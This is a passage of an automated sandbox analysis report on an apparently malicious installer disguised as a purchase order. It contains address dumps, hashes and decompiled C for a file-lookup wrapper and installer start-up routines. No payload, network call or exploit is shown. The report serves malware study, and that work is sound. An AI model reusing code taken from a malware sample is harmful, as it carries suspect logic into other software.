                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040630d
                                                                                                                          0x00406313
                                                                                                                          0x00406316
                                                                                                                          0x00406323
                                                                                                                          0x0040632b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062e2
                                                                                                                          0x004062e2
                                                                                                                          0x004062e6
                                                                                                                          0x00406b31
                                                                                                                          0x00000000
                                                                                                                          0x00406b31
                                                                                                                          0x004062f2
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x00406300
                                                                                                                          0x00406303
                                                                                                                          0x00406306
                                                                                                                          0x0040630b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065d2
                                                                                                                          0x004065d6
                                                                                                                          0x004065f4
                                                                                                                          0x004065f7
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x0040660a
                                                                                                                          0x0040660d
                                                                                                                          0x0040660f
                                                                                                                          0x00406616
                                                                                                                          0x00406617
                                                                                                                          0x00406619
                                                                                                                          0x0040661c
                                                                                                                          0x0040661f
                                                                                                                          0x00406622
                                                                                                                          0x00406622
                                                                                                                          0x00406627
                                                                                                                          0x00000000
                                                                                                                          0x00406627
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040663c
                                                                                                                          0x00406640
                                                                                                                          0x00406663
                                                                                                                          0x00406666
                                                                                                                          0x00406669
                                                                                                                          0x00406673
                                                                                                                          0x00406642
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406648
                                                                                                                          0x0040664b
                                                                                                                          0x00406658
                                                                                                                          0x0040665b
                                                                                                                          0x0040665b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040667f
                                                                                                                          0x00406683
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406689
                                                                                                                          0x0040668d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406693
                                                                                                                          0x00406695
                                                                                                                          0x00406699
                                                                                                                          0x00406699
                                                                                                                          0x0040669c
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066f0
                                                                                                                          0x004066f4
                                                                                                                          0x004066fb
                                                                                                                          0x004066fe
                                                                                                                          0x00406701
                                                                                                                          0x0040670b
                                                                                                                          0x00000000
                                                                                                                          0x0040670b
                                                                                                                          0x004066f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406717
                                                                                                                          0x0040671b
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406744
                                                                                                                          0x00406749
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067d7
                                                                                                                          0x004067d7
                                                                                                                          0x004067db
                                                                                                                          0x00406b79
                                                                                                                          0x00000000
                                                                                                                          0x00406b79
                                                                                                                          0x004067e1
                                                                                                                          0x004067e4
                                                                                                                          0x004067e7
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f4
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f9
                                                                                                                          0x004067fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040662a
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x0040698f
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x00000000
                                                                                                                          0x0040699c
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00000000
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406768
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406772
                                                                                                                          0x00406772
                                                                                                                          0x00406773
                                                                                                                          0x00406776
                                                                                                                          0x0040677d
                                                                                                                          0x00406780
                                                                                                                          0x0040678e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a73
                                                                                                                          0x00406a73
                                                                                                                          0x00406a77
                                                                                                                          0x00406baf
                                                                                                                          0x00000000
                                                                                                                          0x00406baf
                                                                                                                          0x00406a7d
                                                                                                                          0x00406a80
                                                                                                                          0x00406a83
                                                                                                                          0x00406a87
                                                                                                                          0x00406a8a
                                                                                                                          0x00406a90
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a95
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9f
                                                                                                                          0x00406aff
                                                                                                                          0x00406b02
                                                                                                                          0x00406b07
                                                                                                                          0x00406b08
                                                                                                                          0x00406b0a
                                                                                                                          0x00406b0c
                                                                                                                          0x00406b0f
                                                                                                                          0x00000000
                                                                                                                          0x00406b0f
                                                                                                                          0x00406aa1
                                                                                                                          0x00406aa7
                                                                                                                          0x00406aaa
                                                                                                                          0x00406aad
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ab3
                                                                                                                          0x00406ab6
                                                                                                                          0x00406ab9
                                                                                                                          0x00406abc
                                                                                                                          0x00406abf
                                                                                                                          0x00406ac2
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae1
                                                                                                                          0x00406ae4
                                                                                                                          0x00406ae8
                                                                                                                          0x00406aea
                                                                                                                          0x00406aea
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aee
                                                                                                                          0x00406ac4
                                                                                                                          0x00406ac4
                                                                                                                          0x00406acc
                                                                                                                          0x00406ad1
                                                                                                                          0x00406ad3
                                                                                                                          0x00406ad6
                                                                                                                          0x00406ad6
                                                                                                                          0x00406af1
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00000000
                                                                                                                          0x00406b6d
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b3
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                                                                                          • Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
                                                                                                                          • Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                                                                                          • Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 627 405ff6-40600a FindFirstFileA 628 406017 627->628 629 40600c-406015 FindClose 627->629 630 406019-40601a 628->630 629->630
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405FF6(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225d0;
			}




                                                                                                                          0x00406001
                                                                                                                          0x0040600a
                                                                                                                          0x00000000
                                                                                                                          0x00406017
                                                                                                                          0x0040600d
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00406001
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040600D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: C:\
                                                                                                                          • API String ID: 2295610775-3404278061
                                                                                                                          • Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                                                                                          • Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
                                                                                                                          • Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                                                                                          • Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040374E Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 134 40374e-403766 call 406087 137 403768-403778 call 405c59 134->137 138 40377a-4037a1 call 405be2 134->138 147 4037c4-4037ed call 403a17 call 4058cf 137->147 143 4037a3-4037b4 call 405be2 138->143 144 4037b9-4037bf lstrcatA 138->144 143->144 144->147 152 4037f3-4037f8 147->152 153 403874-40387c call 4058cf 147->153 152->153 154 4037fa-40381e call 405be2 152->154 159 40388a-4038af LoadImageA 153->159 160 40387e-403885 call 405d1d 153->160 154->153 161 403820-403822 154->161 163 4038b5-4038eb RegisterClassA 159->163 164 40393e-403946 call 40140b 159->164 160->159 165 403833-40383f lstrlenA 161->165 166 403824-403831 call 405819 161->166 167 4038f1-403939 SystemParametersInfoA CreateWindowExA 163->167 168 403a0d 163->168 177 403950-40395b call 403a17 164->177 178 403948-40394b 164->178 172 403841-40384f lstrcmpiA 165->172 173 403867-40386f call 4057ee call 405cfb 165->173 166->165 167->164 171 403a0f-403a16 168->171 172->173 176 403851-40385b GetFileAttributesA 172->176 173->153 180 403861-403862 call 405835 176->180 181 40385d-40385f 176->181 187 403961-40397b ShowWindow call 40601d 177->187 188 4039e4-4039ec call 4050b9 177->188 178->171 180->173 181->173 181->180 193 403987-403999 GetClassInfoA 187->193 194 40397d-403982 call 40601d 187->194 195 403a06-403a08 call 40140b 188->195 196 4039ee-4039f4 188->196 200 4039b1-4039e2 DialogBoxParamA call 40140b call 40369e 193->200 201 40399b-4039ab GetClassInfoA RegisterClassA 193->201 194->193 195->168 196->178 197 4039fa-403a01 call 40140b 196->197 197->178 200->171 201->200
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0040374E(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f90;
				_t20 = E00406087(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420580;
					"1033" = 0x7830;
					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
					__eflags =  *0x420580;
					if(__eflags == 0) {
						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405C59("1033",  *_t20() & 0x0000ffff);
				}
				E00403A17(_t76, _t88);
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x424000 =  *0x423f98 & 0x00000020;
				 *0x42401c = 0x10000;
				if(E004058CF(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004058CF(_t96, _t84) == 0) {
						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423768 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403A17(_t76, __eflags);
							__eflags =  *0x424020;
							if( *0x424020 != 0) {
								_t31 = E004050B9(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42374c;
								if( *0x42374c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420558, 5);
							_t37 = E0040601D("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E0040601D("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423720);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423720);
								 *0x423744 = _t85;
								RegisterClassA(0x423720);
							}
							_t42 = DialogBoxParamA( *0x423f80,  *0x423760 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
							E0040369E(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f80;
						 *0x423734 = _t28;
						_v20 = 0x624e5f;
						 *0x423724 = E00401000;
						 *0x423730 =  *0x423f80;
						 *0x423744 =  &_v20;
						if(RegisterClassA(0x423720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422f20;
					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423fb8, 0x422f20, 0);
					_t62 =  *0x422f20; // 0x22
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422f21;
						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405CFB(_t84, E004057EE(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405835(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                          0x00403754
                                                                                                                          0x0040375d
                                                                                                                          0x00403764
                                                                                                                          0x00403766
                                                                                                                          0x0040377a
                                                                                                                          0x0040378c
                                                                                                                          0x00403796
                                                                                                                          0x0040379b
                                                                                                                          0x004037a1
                                                                                                                          0x004037b4
                                                                                                                          0x004037b4
                                                                                                                          0x004037bf
                                                                                                                          0x00403768
                                                                                                                          0x00403773
                                                                                                                          0x00403773
                                                                                                                          0x004037c4
                                                                                                                          0x004037ce
                                                                                                                          0x004037d7
                                                                                                                          0x004037dc
                                                                                                                          0x004037ed
                                                                                                                          0x00403874
                                                                                                                          0x0040387c
                                                                                                                          0x00403885
                                                                                                                          0x00403885
                                                                                                                          0x0040389b
                                                                                                                          0x004038a1
                                                                                                                          0x004038af
                                                                                                                          0x0040393e
                                                                                                                          0x00403946
                                                                                                                          0x00403950
                                                                                                                          0x00403955
                                                                                                                          0x0040395b
                                                                                                                          0x004039e5
                                                                                                                          0x004039ea
                                                                                                                          0x004039ec
                                                                                                                          0x00403a08
                                                                                                                          0x00000000
                                                                                                                          0x00403a08
                                                                                                                          0x004039ee
                                                                                                                          0x004039f4
                                                                                                                          0x004039fc
                                                                                                                          0x004039fc
                                                                                                                          0x00000000
                                                                                                                          0x004039f4
                                                                                                                          0x00403969
                                                                                                                          0x00403974
                                                                                                                          0x00403979
                                                                                                                          0x0040397b
                                                                                                                          0x00403982
                                                                                                                          0x00403982
                                                                                                                          0x0040398d
                                                                                                                          0x00403995
                                                                                                                          0x00403997
                                                                                                                          0x00403999
                                                                                                                          0x004039a2
                                                                                                                          0x004039a5
                                                                                                                          0x004039ab
                                                                                                                          0x004039ab
                                                                                                                          0x004039ca
                                                                                                                          0x004039db
                                                                                                                          0x00000000
                                                                                                                          0x004039e0
                                                                                                                          0x00403948
                                                                                                                          0x0040394a
                                                                                                                          0x00000000
                                                                                                                          0x004038b5
                                                                                                                          0x004038b5
                                                                                                                          0x004038bb
                                                                                                                          0x004038c5
                                                                                                                          0x004038cd
                                                                                                                          0x004038d7
                                                                                                                          0x004038dd
                                                                                                                          0x004038eb
                                                                                                                          0x00403a0d
                                                                                                                          0x00403a0d
                                                                                                                          0x00000000
                                                                                                                          0x00403a0d
                                                                                                                          0x004038f1
                                                                                                                          0x004038fa
                                                                                                                          0x00403939
                                                                                                                          0x00000000
                                                                                                                          0x00403939
                                                                                                                          0x004037f3
                                                                                                                          0x004037f3
                                                                                                                          0x004037f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403802
                                                                                                                          0x00403812
                                                                                                                          0x00403817
                                                                                                                          0x0040381e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403822
                                                                                                                          0x00403824
                                                                                                                          0x00403831
                                                                                                                          0x00403831
                                                                                                                          0x00403839
                                                                                                                          0x0040383f
                                                                                                                          0x00403867
                                                                                                                          0x0040386f
                                                                                                                          0x00000000
                                                                                                                          0x00403851
                                                                                                                          0x00403852
                                                                                                                          0x0040385b
                                                                                                                          0x00403861
                                                                                                                          0x00403862
                                                                                                                          0x00000000
                                                                                                                          0x00403862
                                                                                                                          0x0040385d
                                                                                                                          0x0040385f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040385f
                                                                                                                          0x0040383f

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                                                                            • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
